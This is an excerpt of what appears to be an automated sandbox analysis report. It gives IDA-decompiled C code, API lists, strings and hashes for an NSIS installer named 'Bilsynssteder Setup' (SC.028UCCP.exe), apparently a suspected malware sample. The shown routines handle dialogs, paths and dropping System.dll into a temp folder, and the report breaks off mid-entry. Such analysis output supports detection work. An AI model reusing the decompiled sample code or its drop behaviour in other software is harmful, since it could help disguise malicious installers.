                                  				_t46 = _a12;
                                  				_push(0x14);
                                  				_pop(0);
                                  				_t34 = 0xffffffdc;
                                  				if(_t46 < 0x100000) {
                                  					_push(0xa);
                                  					_pop(0);
                                  					_t34 = 0xffffffdd;
                                  				}
                                  				if(_t46 < 0x400) {
                                  					_t34 = 0xffffffde;
                                  				}
                                  				if(_t46 < 0xffff3333) {
                                  					_t39 = 0x14;
                                  					asm("cdq");
                                  					_t46 = _t46 + 1 / _t39;
                                  				}
                                  				_push(E00405BBA(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                  				_push(E00405BBA(_t34, 0, _t46,  &_v68, _t34));
                                  				_t21 = _t46 & 0x00ffffff;
                                  				_t36 = 0xa;
                                  				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                  				_push(_t46 >> 0);
                                  				_t26 = E00405BBA(_t34, 0, 0x42a020, 0x42a020, _a8);
                                  				wsprintfA(_t26 + lstrlenA(0x42a020), "%u.%u%s%s");
                                  				return SetDlgItemTextA( *0x42e378, _a4, 0x42a020);
                                  			}














                                  APIs
                                  • lstrlenA.KERNEL32(0042A020,0042A020,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AE,000000DF,0000040F,00000400,00000000), ref: 0040471C
                                  • wsprintfA.USER32 ref: 00404724
                                  • SetDlgItemTextA.USER32 ref: 00404737
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
                                  • Instruction ID: 203f11412081ff20a0a771540c2b0fd723cd680d979dc2a143f6ad93c85b8d83
                                  • Opcode Fuzzy Hash: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
                                  • Instruction Fuzzy Hash: C0113B33A0013437DB0065699C05EAF325ADBC2335F140237FA25F61D1E9799C1185E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00401BB8() {
                                  				signed int _t28;
                                  				CHAR* _t31;
                                  				long _t32;
                                  				int _t37;
                                  				signed int _t38;
                                  				int _t42;
                                  				int _t48;
                                  				struct HWND__* _t52;
                                  				void* _t55;
                                  
                                  				 *(_t55 - 0x34) = E004029EA(3);
                                  				 *(_t55 + 8) = E004029EA(4);
                                  				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                  					 *((intOrPtr*)(__ebp - 0x34)) = E00402A07(0x33);
                                  				}
                                  				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                  				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                  					 *(_t55 + 8) = E00402A07(0x44);
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                  				_push(1);
                                  				if(__eflags != 0) {
                                  					_t50 = E00402A07();
                                  					_t28 = E00402A07();
                                  					asm("sbb ecx, ecx");
                                  					asm("sbb eax, eax");
                                  					_t31 =  ~( *_t27) & _t50;
                                  					__eflags = _t31;
                                  					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                  					goto L10;
                                  				} else {
                                  					_t52 = E004029EA();
                                  					_t37 = E004029EA();
                                  					_t48 =  *(_t55 - 0x10) >> 2;
                                  					if(__eflags == 0) {
                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                  						L10:
                                  						 *(_t55 - 8) = _t32;
                                  					} else {
                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                  						asm("sbb eax, eax");
                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                  					}
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                  				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                  					_push( *(_t55 - 8));
                                  					E00405AF6();
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t55 - 4));
                                  				return 0;
                                  			}













                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                  • SendMessageA.USER32 ref: 00401C30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
                                  • Instruction ID: f21ca504329920278120de39c351f2906d9b7b9b661f4dd592fc9a47aef1d7f1
                                  • Opcode Fuzzy Hash: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
                                  • Instruction Fuzzy Hash: B5219071A44248AFEF01AFB4CD8AAAE7FB5EF44348F14043EF501B61E1D6B99940DB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403908(void* __ecx, void* __eflags) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed short _t6;
                                  				intOrPtr _t11;
                                  				signed int _t13;
                                  				intOrPtr _t15;
                                  				signed int _t16;
                                  				signed short* _t18;
                                  				signed int _t20;
                                  				signed short* _t23;
                                  				intOrPtr _t25;
                                  				signed int _t26;
                                  				intOrPtr* _t27;
                                  
                                  				_t24 = "1033";
                                  				_t13 = 0xffff;
                                  				_t6 = E00405B0F(__ecx, "1033");
                                  				while(1) {
                                  					_t26 =  *0x42ebe4; // 0x1
                                  					if(_t26 == 0) {
                                  						goto L7;
                                  					}
                                  					_t15 =  *0x42ebb0; // 0x5aa248
                                  					_t16 =  *(_t15 + 0x64);
                                  					_t20 =  ~_t16;
                                  					_t18 = _t16 * _t26 +  *0x42ebe0;
                                  					while(1) {
                                  						_t18 = _t18 + _t20;
                                  						_t26 = _t26 - 1;
                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                  							break;
                                  						}
                                  						if(_t26 != 0) {
                                  							continue;
                                  						}
                                  						goto L7;
                                  					}
                                  					 *0x42e380 = _t18[1];
                                  					 *0x42ec48 = _t18[3];
                                  					_t23 =  &(_t18[5]);
                                  					if(_t23 != 0) {
                                  						 *0x42e37c = _t23;
                                  						E00405AF6(_t24,  *_t18 & 0x0000ffff);
                                  						SetWindowTextA( *0x42a000, E00405BBA(_t13, _t24, _t26, "Bilsynssteder Setup", 0xfffffffe));
                                  						_t11 =  *0x42ebcc; // 0x1
                                  						_t27 =  *0x42ebc8; // 0x5aa474
                                  						if(_t11 == 0) {
                                  							L15:
                                  							return _t11;
                                  						}
                                  						_t25 = _t11;
                                  						do {
                                  							_t11 =  *_t27;
                                  							if(_t11 != 0) {
                                  								_t5 = _t27 + 0x18; // 0x5aa48c
                                  								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
                                  							}
                                  							_t27 = _t27 + 0x418;
                                  							_t25 = _t25 - 1;
                                  						} while (_t25 != 0);
                                  						goto L15;
                                  					}
                                  					L7:
                                  					if(_t13 != 0xffff) {
                                  						_t13 = 0;
                                  					} else {
                                  						_t13 = 0x3ff;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SetWindowTextA.USER32(00000000,Bilsynssteder Setup), ref: 004039A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$1033$Bilsynssteder Setup
                                  • API String ID: 530164218-2271253969
                                  • Opcode ID: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
                                  • Instruction ID: 61f94bd1e48dda17ae9277a932331f79ad4cfb9e5e678fa4023af28e916b2a63
                                  • Opcode Fuzzy Hash: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
                                  • Instruction Fuzzy Hash: 5911F3B1B046009BC734DF56DC80A733B6DEB85716768417BEC02A73E0C779AD028A58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405645(CHAR* _a4) {
                                  				CHAR* _t7;
                                  
                                  				_t7 = _a4;
                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                  					lstrcatA(_t7, 0x409014);
                                  				}
                                  				return _t7;
                                  			}

                                  APIs
                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 0040564B
                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405654
                                  • lstrcatA.KERNEL32(?,00409014), ref: 00405665
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405645
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3916508600
                                  • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                  • Instruction ID: 2c4aba1e68f569edc0bbdca96b08fce85388150d4565a43965472bde34b66e99
                                  • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                  • Instruction Fuzzy Hash: 68D0A9626069306AE60223258C05E8B3A2CDF12312B080062F200B62A2C6BC6E418BFE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00401EDC(char __ebx, char* __edi, char* __esi) {
                                  				char* _t18;
                                  				int _t19;
                                  				void* _t30;
                                  
                                  				_t18 = E00402A07(0xffffffee);
                                  				 *(_t30 - 0x30) = _t18;
                                  				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x2c);
                                  				 *__esi = __ebx;
                                  				 *(_t30 - 8) = _t19;
                                  				 *__edi = __ebx;
                                  				 *((intOrPtr*)(_t30 - 4)) = 1;
                                  				if(_t19 != __ebx) {
                                  					__eax = GlobalAlloc(0x40, __eax);
                                  					 *(__ebp + 8) = __eax;
                                  					if(__eax != __ebx) {
                                  						if(__eax != 0) {
                                  							__ebp - 0x44 = __ebp - 0x34;
                                  							if(VerQueryValueA( *(__ebp + 8), 0x409014, __ebp - 0x34, __ebp - 0x44) != 0) {
                                  								 *(__ebp - 0x34) = E00405AF6(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                  								 *(__ebp - 0x34) = E00405AF6(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                  								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                  							}
                                  						}
                                  						_push( *(__ebp + 8));
                                  						GlobalFree();
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
                                  				return 0;
                                  			}

                                  APIs
                                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                  • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                  • String ID:
                                  • API String ID: 1404258612-0
                                  • Opcode ID: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
                                  • Instruction ID: f900153287ab474cfde03a6598713ff26eba214e440f244ace580773df7c575c
                                  • Opcode Fuzzy Hash: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
                                  • Instruction Fuzzy Hash: 7D114C71A00108BEDB01EFA5DD81DAEBBB9EF04344B20407AF505F61A2D7789A54DB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004056DE(CHAR* _a4) {
                                  				CHAR* _t5;
                                  				char* _t7;
                                  				CHAR* _t9;
                                  				char _t10;
                                  				CHAR* _t11;
                                  				void* _t13;
                                  
                                  				_t11 = _a4;
                                  				_t9 = CharNextA(_t11);
                                  				_t5 = CharNextA(_t9);
                                  				_t10 =  *_t11;
                                  				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                  					if(_t10 != 0x5c || _t11[1] != _t10) {
                                  						L10:
                                  						return 0;
                                  					} else {
                                  						_t13 = 2;
                                  						while(1) {
                                  							_t13 = _t13 - 1;
                                  							_t7 = E00405670(_t5, 0x5c);
                                  							if( *_t7 == 0) {
                                  								goto L10;
                                  							}
                                  							_t5 = _t7 + 1;
                                  							if(_t13 != 0) {
                                  								continue;
                                  							}
                                  							return _t5;
                                  						}
                                  						goto L10;
                                  					}
                                  				} else {
                                  					return CharNextA(_t5);
                                  				}
                                  			}

                                  APIs
                                  • CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                  • CharNextA.USER32(00000000), ref: 004056F1
                                  • CharNextA.USER32(00000000), ref: 00405705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: Resolver.Sel
                                  • API String ID: 3213498283-3053244350
                                  • Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                  • Instruction ID: e3580abeef22c051b0f2771d67a3f552fa31247d9b875f7e27f1ca38f70f0df6
                                  • Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                  • Instruction Fuzzy Hash: A7F0F661D04F60EAFB32A6641C54F775BC8CB55390F04547BE640772C2C27C48416FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402BCF(intOrPtr _a4) {
                                  				long _t2;
                                  				struct HWND__* _t3;
                                  				struct HWND__* _t6;
                                  
                                  				if(_a4 == 0) {
                                  					__eflags =  *0x420bd0; // 0x0
                                  					if(__eflags == 0) {
                                  						_t2 = GetTickCount();
                                  						__eflags = _t2 -  *0x42ebac;
                                  						if(_t2 >  *0x42ebac) {
                                  							_t3 = CreateDialogParamA( *0x42eba0, 0x6f, 0, E00402B4C, 0);
                                  							 *0x420bd0 = _t3;
                                  							return ShowWindow(_t3, 5);
                                  						}
                                  						return _t2;
                                  					} else {
                                  						return E00405EFC(0);
                                  					}
                                  				} else {
                                  					_t6 =  *0x420bd0; // 0x0
                                  					if(_t6 != 0) {
                                  						_t6 = DestroyWindow(_t6);
                                  					}
                                  					 *0x420bd0 = 0;
                                  					return _t6;
                                  				}
                                  			}

                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                  • GetTickCount.KERNEL32 ref: 00402C00
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
                                  • Instruction ID: 54a0d07438df805a889332e5fe20a84f483a1b8d84b4f98cf8bddfbad8bd3af6
                                  • Opcode Fuzzy Hash: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
                                  • Instruction Fuzzy Hash: 13F03A30A09220ABC670AF54BE5CA8FBFA4B704B12F504876F105F11F5C778A8829B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00405733(void* __eflags, intOrPtr _a4) {
                                  				int _t11;
                                  				signed char* _t12;
                                  				intOrPtr _t18;
                                  				intOrPtr* _t21;
                                  				void* _t22;
                                  
                                  				E00405B98(0x42b428, _a4);
                                  				_t21 = E004056DE(0x42b428);
                                  				if(_t21 != 0) {
                                  					E00405E03(_t21);
                                  					if(( *0x42ebb8 & 0x00000080) == 0) {
                                  						L5:
                                  						_t22 = _t21 - 0x42b428;
                                  						while(1) {
                                  							_t11 = lstrlenA(0x42b428);
                                  							_push(0x42b428);
                                  							if(_t11 <= _t22) {
                                  								break;
                                  							}
                                  							_t12 = E00405E9C();
                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                  								E0040568C(0x42b428);
                                  								continue;
                                  							} else {
                                  								goto L1;
                                  							}
                                  						}
                                  						E00405645();
                                  						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                  					}
                                  					_t18 =  *_t21;
                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                  						goto L1;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				}
                                  				L1:
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705
                                  • lstrlenA.KERNEL32(Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 00405786
                                  • GetFileAttributesA.KERNEL32(Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90), ref: 00405796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: Resolver.Sel
                                  • API String ID: 3248276644-3053244350
                                  • Opcode ID: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
                                  • Instruction ID: 46d2e0665c70af9664fe3e2e68506d2637a0e9b19dc503987d8b7146b8cfa3eb
                                  • Opcode Fuzzy Hash: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
                                  • Instruction Fuzzy Hash: 45F02825104D5056C62233361C09BAF1B48CE82324F580A3BFC94B32D2DB3C9943EDBE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004024CF(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                  				int _t5;
                                  				long _t7;
                                  				struct _OVERLAPPED* _t11;
                                  				intOrPtr* _t15;
                                  				void* _t17;
                                  				int _t21;
                                  
                                  				_t15 = __esi;
                                  				_t11 = __ebx;
                                  				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                  					_t7 = lstrlenA(E00402A07(0x11));
                                  				} else {
                                  					E004029EA(1);
                                  					 *0x409fc0 = __al;
                                  				}
                                  				if( *_t15 == _t11) {
                                  					L8:
                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                  				} else {
                                  					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll", _t7, _t17 + 8, _t11);
                                  					_t21 = _t5;
                                  					if(_t21 == 0) {
                                  						goto L8;
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
                                  				return 0;
                                  			}










                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll, xrefs: 004024DB, 00402500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileWritelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll
                                  • API String ID: 427699356-988332474
                                  • Opcode ID: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
                                  • Instruction ID: 4ea93a9a16b3ba26abbe76c2db383f10a173eb7eb3d60b9d4cac17740c2ddad1
                                  • Opcode Fuzzy Hash: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
                                  • Instruction Fuzzy Hash: 5CF08972A54141AFDB10EBA59E49EAF7668DB00304F14843BF141F51C2DAFCA941D76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004035AE() {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t6;
                                  				void* _t8;
                                  
                                  				_t8 =  *0x428fe4; // 0x5bf4a8
                                  				_t3 = E00403593(_t2, 0);
                                  				if(_t8 != 0) {
                                  					do {
                                  						_t6 = _t8;
                                  						_t8 =  *_t8;
                                  						FreeLibrary( *(_t6 + 8));
                                  						_t3 = GlobalFree(_t6);
                                  					} while (_t8 != 0);
                                  				}
                                  				 *0x428fe4 =  *0x428fe4 & 0x00000000;
                                  				return _t3;
                                  			}








                                  APIs
                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74D0FA90,00403586,004033CA,?), ref: 004035C8
                                  • GlobalFree.KERNEL32 ref: 004035CF
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004035C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3916508600
                                  • Opcode ID: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
                                  • Instruction ID: 7a8d405bc8bd7fec033f8d43938e5e29d5ac8ab2bcc25f37624c4f675abd0e47
                                  • Opcode Fuzzy Hash: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
                                  • Instruction Fuzzy Hash: 02E08C32912420ABC6225F44EE04B5A7BA86B5CB22F06002BE8407B2A08B746D428AC8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040568C(char* _a4) {
                                  				char* _t3;
                                  				char* _t5;
                                  
                                  				_t5 = _a4;
                                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                                  				while( *_t3 != 0x5c) {
                                  					_t3 = CharPrevA(_t5, _t3);
                                  					if(_t3 > _t5) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				 *_t3 =  *_t3 & 0x00000000;
                                  				return  &(_t3[1]);
                                  			}






                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00405692
                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 004056A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-1669384263
                                  • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                  • Instruction ID: 7c4e54bae153d6ca8f15abcb2bf58ef5fe37b9cdc0349e7599eda1ff56861401
